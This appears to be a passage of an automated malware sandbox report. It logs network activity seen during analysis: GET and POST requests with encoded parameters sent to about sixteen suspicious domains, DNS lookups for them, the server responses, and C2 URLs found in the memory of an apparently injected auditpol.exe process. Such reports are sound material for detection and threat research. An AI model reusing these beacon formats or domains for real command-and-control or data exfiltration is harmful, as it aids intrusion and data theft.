Source: global traffic	HTTP traffic detected: GET /ljdj/?sL9tFJ=ZICPfDYGGExxFAxCww1xwUjvDbJY85yXQI6dp2kJB8RnqeyNXlFMy7FVDhewpD/mY7kOCunrzTJsDmzjVkamuOhh+qvjCKHphba70ug78hyc7mtXPvEWT9U=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.inf30027group23.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /51hg/?sL9tFJ=lzb8Q+1ZkRYL+ndO3j5PVMDGwV51DFPdeivGsnVW/hUSyu5WpgLMVT/2ZD9ppe7fxW6d+w7xhCgyU1oioUeFR6Wo19Fxr1GQyE0P1h5QkDnbWNzfENeGUo8=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.mudanya-nakliyat.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /m4jf/?sL9tFJ=0TgQC1Luv9cVf1TCKLCdjgzht3H610PutW8Pu5k4ZnbC5HUSntLYriRCMSQSDyNJ5vKB93oSdDtzFOKGboJdJ4jxO8kQzN3YuKmjgHKVRyz7ENXIVwzZU4M=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.solargridxx.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /87wq/?sL9tFJ=7bLn2toYuHgKY4svyzPVudTtlla1bf7PpnNwFD1LjHXMN8tsWMAuSdGiuKH0HcFEBqk44V2BEBEKz59MOu/v9Tn1fU8u33FZ8GhyTM58dtSMSWcfKlkKKIE=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.airtech365.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /uaxy/?sL9tFJ=jCoxKbndYFu2rVUc2fNf8o1DCs+xE29ELzrRYPIrNX671AzrKUsZ0ekHPlezV1wvKt2FOH2y7yDiMlHHG1j7pH9tJsj87FCdBv0goUpKNozmpGwQ2nrx39s=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.x100.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /i70z/?gB7t=xFqX1hC8&sL9tFJ=ggo41uDwxRIOOoeP1Oo5p7RDznCtlfKlzUAj4DLPY1E55MlxYQjRP3RbpEn9FapIu2dLvf4ZjTINa65Ki93S9Jq8KjMoDKqt4A2Swb3ejqHfvRtW1ozGZVs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.63582.photoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.63582.photo
Source: global traffic	DNS traffic detected: DNS query: www.bonusgame2024.online
Source: global traffic	DNS traffic detected: DNS query: www.stayup.top
Source: global traffic	DNS traffic detected: DNS query: www.luxe.guru
Source: global traffic	DNS traffic detected: DNS query: www.newdaydawning.net
Source: global traffic	DNS traffic detected: DNS query: www.theclydefund.info
Source: global traffic	DNS traffic detected: DNS query: www.crowsecurity.cloud
Source: global traffic	DNS traffic detected: DNS query: www.languyenthuyduyen.xyz
Source: global traffic	DNS traffic detected: DNS query: www.comrade.lol
Source: global traffic	DNS traffic detected: DNS query: www.13149200.xyz
Source: global traffic	DNS traffic detected: DNS query: www.inf30027group23.xyz
Source: global traffic	DNS traffic detected: DNS query: www.mudanya-nakliyat.xyz
Source: global traffic	DNS traffic detected: DNS query: www.solargridxx.shop
Source: global traffic	DNS traffic detected: DNS query: www.popin.space
Source: global traffic	DNS traffic detected: DNS query: www.airtech365.net
Source: global traffic	DNS traffic detected: DNS query: www.x100.shop

Source: unknown

HTTP traffic detected: POST /gubb/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.stayup.topContent-Type: application/x-www-form-urlencodedContent-Length: 203Connection: closeCache-Control: no-cacheOrigin: http://www.stayup.topReferer: http://www.stayup.top/gubb/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36Data Raw: 73 4c 39 74 46 4a 3d 6c 4e 4c 41 65 32 6c 30 51 6b 70 62 42 30 76 6b 36 72 79 46 36 4d 2b 6f 64 4e 4f 48 66 69 35 64 38 6f 76 37 37 38 79 53 6b 73 51 63 67 68 5a 31 44 46 5a 78 4e 4d 7a 4a 4e 45 73 59 78 6a 57 55 6b 46 35 44 71 31 61 4d 2b 68 4a 66 44 4e 53 66 2f 43 57 69 6d 51 36 44 58 44 4a 55 4d 53 48 79 70 61 44 65 4b 73 47 34 4f 35 76 57 6d 31 35 6d 7a 4c 69 71 39 4d 6f 55 37 66 71 38 57 53 42 42 4b 49 47 69 4c 35 46 6d 71 76 47 79 35 35 43 6b 2f 4f 37 69 49 69 44 31 73 51 6b 71 51 4e 55 4a 4e 69 47 7a 6e 41 47 72 38 6b 77 43 56 56 57 4c 68 39 72 4b 4f 54 64 4e 34 6e 48 74 37 4e 66 79 65 67 3d 3d Data Ascii: sL9tFJ=lNLAe2l0QkpbB0vk6ryF6M+odNOHfi5d8ov778ySksQcghZ1DFZxNMzJNEsYxjWUkF5Dq1aM+hJfDNSf/CWimQ6DXDJUMSHypaDeKsG4O5vWm15mzLiq9MoU7fq8WSBBKIGiL5FmqvGy55Ck/O7iIiD1sQkqQNUJNiGznAGr8kwCVVWLh9rKOTdN4nHt7Nfyeg==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 12:24:14 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 12:24:17 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 12:24:20 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 12:24:22 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 12:24:41 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 12:24:44 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 3da_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 26 Sep 2024 12:26:01 GMTserver: LiteSpeedData Raw: 35 38 62 65 0d 0a f4 ff 1f 22 2a 7b 3f 9c 22 92 95 ce 1f 02 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff cc d7 ac b3 bb 6a 0e f7 d7 54 b5 2d ba 01 08 00 3f 92 a9 c8 49 7f e7 9b 4d 2a 3d 99 cf b6 bd 2a 88 7c a4 d0 06 01 06 00 f5 09 87 55 7b bc ed f1 be 97 99 96 6f b1 ca 8f 7f 07 5b 1e 8f b3 6c 10 27 09 ca 92 f6 f0 ce 1e 89 9d f1 1e b7 53 0c 44 42 12 6d 88 e0 12 90 64 cd 94 ab f2 fc e5 f9 cf ff ef ef b5 af bc b0 89 a2 89 27 25 cc dc b6 25 0f 00 c7 c0 d1 86 13 dc 07 c1 7b 92 03 c9 52 00 76 20 43 60 59 5e 6b 6c ab f6 de 87 ee bb 0f 04 b6 ab 65 bb c0 54 d5 ae fa 54 dc fe 80 ae f2 6f 82 fa 3d 84 d9 04 21 ba aa 89 ea ff 01 0a 87 93 ec ca aa d5 4b fe 43 18 fe 70 d6 44 95 4e 9e f5 fe 61 f5 6f 76 f7 5f e7 10 44 e4 10 4c ab 35 19 aa fd 1e 06 63 0c 5a 48 3a 92 f6 31 2c eb da dd bf f7 77 26 22 a2 a2 22 02 69 5f c3 b7 fe f5 b6 f7 6e a6 bd ef 6e 63 00 15 95 18 44 4c 97 b1 d5 dd 67 28 51 1b 21 c8 80 19 d2 09 50 d7 57 30 1b 7b b3 7d d5 9b ef 12 b4 f4 d7 2f c9 23 25 37 f7 18 2f 93 ff 58 c0 b8 4b 8e fd ee e2 96 59 d5 e3 2e 61 96 52 82 0e 1f 45 bd 67 57 f4 1a 02 07 7a ff e7 8e 86 5a 19 dc 89 e4 f1 0f af 6e e0 3b a3 ed 0b 78 34 bb 64 f0 ae d5 06 a7 2b be 8b a1 5a ad ba 7e e8 98 f3 dd ea d2 da 95 10 c9 23 a4 15 38 3c e2 ce bb 83 8b e1 ee f3 a6 3b eb ae 9d 7f 92 c0 09 df 96 df c1 ea f1 d5 ab 9b a3 e3 cb 6b 60 7c 8b 83 8e 08 3a 80 1b a2 ee f5 ef d8 c0 59 c7 e3 e5 3f de e6 df 4e 85 08 5f 3e fd 04 e7 8c 5b 09 27 99 b1 0c 28 a0 74 c3 d5 a9 10 6f 1e c0 ab 9c 9d 6f 06 8f 21 ac c0 6f 17 56 01 dd 0a 28 7d 7c c5 fc 37 fb 59 75 08 d6 45 d8 bf eb cd 28 fc 78 85 f7 c6 75 a7 62 eb 7d 75 2e 4b cd 16 cf 69 5c ad 0c 12 f4 43 80 76 ff eb 97 04 56 49 20 37 f9 3d a8 dc b0 4c bc 8c 61 a4 6b 85 b3 18 3c 1f c4 eb 80 bb 84 af 4e 36 cd db 6f c1 59 56 03 02 ad a0 a1 3e 62 af e8 91 f5 17 93 c7 29 f9 a1 36 87 2e 31 a9 1a 16 c1 4e 63 ce 77 09 49 7e 80 7e eb ab af 53 f2 43 bc 0e 98 54 c9 3f f1 f0 45 47 4c 48 f2 83 6e d2 3e 42 db 36 e3 5c ae 77 4f bb 42 66 ec 72 fd 7d b5 78 7d ce cb 92 90 64 f4 e6 cf 54 42 92 ea b6 ab 6a ce 93 a4 c1 cf d3 da d9 b8 95 ff 74 be f9 d9 63 08 50 42 52 cf bb 9a b0 72 a7 57 28 7e 27 d4 a1 64 26 89 68 76 df d5 25 c9 ea f2 79 11 29 f2 14 92 44 e5 3b 8c 65 11 d0 ab 7c b2 d1 5f 7f 76 da c6 5a 7e 58 fe 8e fd 60 54 44 44 0e 7e 1f 76 d3 49 1f ff 52 f7 11 7d bf 0f d1 6b db cd c9 4c 92 df 46 f4 57 aa ed 30 c6 a4 4a 34 06 4a 94 27 d9 Data Ascii: 58be"{?")/&>yjT-?IM=*\|U{o[l'SDBmd'%%{Rv C`Y^kleT
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 3da_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://inf30027group23.xyz/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 26 Sep 2024 12:26:06 GMTserver: LiteSpeedData Raw: 35 38 62 65 0d 0a f4 ff 1f 22 2a 7b 3f 9c 22 92 95 ce 1f 02 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff cc d7 ac b3 bb 6a 0e f7 d7 54 b5 2d ba 01 08 00 3f 92 a9 c8 49 7f e7 9b 4d 2a 3d 99 cf b6 bd 2a 88 7c a4 d0 06 01 06 00 f5 09 87 55 7b bc ed f1 be 97 99 96 6f b1 ca 8f 7f 07 5b 1e 8f b3 6c 10 27 09 ca 92 f6 f0 ce 1e 89 9d f1 1e b7 53 0c 44 42 12 6d 88 e0 12 90 64 cd 94 ab f2 fc e5 f9 cf ff ef ef b5 af bc b0 89 a2 89 27 25 cc dc b6 25 0f 00 c7 c0 d1 86 13 dc 07 c1 7b 92 03 c9 52 00 76 20 43 60 59 5e 6b 6c ab f6 de 87 ee bb 0f 04 b6 ab 65 bb c0 54 d5 ae fa 54 dc fe 80 ae f2 6f 82 fa 3d 84 d9 04 21 ba aa 89 ea ff 01 0a 87 93 ec ca aa d5 4b fe 43 18 fe 70 d6 44 95 4e 9e f5 fe 61 f5 6f 76 f7 5f e7 10 44 e4 10 4c ab 35 19 aa fd 1e 06 63 0c 5a 48 3a 92 f6 31 2c eb da dd bf f7 77 26 22 a2 a2 22 02 69 5f c3 b7 fe f5 b6 f7 6e a6 bd ef 6e 63 00 15 95 18 44 4c 97 b1 d5 dd 67 28 51 1b 21 c8 80 19 d2 09 50 d7 57 30 1b 7b b3 7d d5 9b ef 12 b4 f4 d7 2f c9 23 25 37 f7 18 2f 93 ff 58 c0 b8 4b 8e fd ee e2 96 59 d5 e3 2e 61 96 52 82 0e 1f 45 bd 67 57 f4 1a 02 07 7a ff e7 8e 86 5a 19 dc 89 e4 f1 0f af 6e e0 3b a3 ed 0b 78 34 bb 64 f0 ae d5 06 a7 2b be 8b a1 5a ad ba 7e e8 98 f3 dd ea d2 da 95 10 c9 23 a4 15 38 3c e2 ce bb 83 8b e1 ee f3 a6 3b eb ae 9d 7f 92 c0 09 df 96 df c1 ea f1 d5 ab 9b a3 e3 cb 6b 60 7c 8b 83 8e 08 3a 80 1b a2 ee f5 ef d8 c0 59 c7 e3 e5 3f de e6 df 4e 85 08 5f 3e fd 04 e7 8c 5b 09 27 99 b1 0c 28 a0 74 c3 d5 a9 10 6f 1e c0 ab 9c 9d 6f 06 8f 21 ac c0 6f 17 56 01 dd 0a 28 7d 7c c5 fc 37 fb 59 75 08 d6 45 d8 bf eb cd 28 fc 78 85 f7 c6 75 a7 62 eb 7d 75 2e 4b cd 16 cf 69 5c ad 0c 12 f4 43 80 76 ff eb 97 04 56 49 20 37 f9 3d a8 dc b0 4c bc 8c 61 a4 6b 85 b3 18 3c 1f c4 eb 80 bb 84 af 4e 36 cd db 6f c1 59 56 03 02 ad a0 a1 3e 62 af e8 91 f5 17 93 c7 29 f9 a1 36 87 2e 31 a9 1a 16 c1 4e 63 ce 77 09 49 7e 80 7e eb ab af 53 f2 43 bc 0e 98 54 c9 3f f1 f0 45 47 4c 48 f2 83 6e d2 3e 42 db 36 e3 5c ae 77 4f bb 42 66 ec 72 fd 7d b5 78 7d ce cb 92 90 64 f4 e6 cf 54 42 92 ea b6 ab 6a ce 93 a4 c1 cf d3 da d9 b8 95 ff 74 be f9 d9 63 08 50 42 52 cf bb 9a b0 72 a7 57 28 7e 27 d4 a1 64 26 89 68 76 df d5 25 c9 ea f2 79 11 29 f2 14 92 44 e5 3b 8c 65 11 d0 ab 7c b2 d1 5f 7f 76 da c6 5a 7e 58 fe 8e fd 60 54 44 44 0e 7e 1f 76 d3 49 1f ff 52 f7 11 7d bf 0f d1 6b db cd c9 4c 92 df 46 f4 57 aa ed 30 c6 a4 4a 34 06 4a 94 27 d9 Data Ascii: 58be"{?")/&>yjT-?IM=*\|U{o[l'SDBmd'%%{Rv C`Y^kleT
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 26 Sep 2024 12:26:22 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-26T12:26:27.1552475Z

Source: auditpol.exe, 0000000A.00000002.4130231943.0000000004FE8000.00000004.10000000.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129772358.00000000039F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://inf30027group23.xyz/ljdj/?sL9tFJ=ZICPfDYGGExxFAxCww1xwUjvDbJY85yXQI6dp2kJB8RnqeyNXlFMy7FVDhew
Source: auditpol.exe, 0000000A.00000002.4130231943.000000000467C000.00000004.10000000.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129772358.000000000308C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://newdaydawning.net/paa2/?sL9tFJ=n7l4pK2vJUox4BGRRaSHHdo
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: auditpol.exe, 0000000A.00000002.4130231943.0000000004B32000.00000004.10000000.00040000.00000000.sdmp, uIklAoJgpkP.exe, 0000000B.00000002.4129772358.0000000003542000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.languyenthuyduyen.xyz/cgi-sys/suspendedpage.cgi?sL9tFJ=kPi1sGtrrK6MgvdeecyTfrcQSpO0wr028E
Source: uIklAoJgpkP.exe, 0000000B.00000002.4131269057.0000000004AE2000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.x100.shop
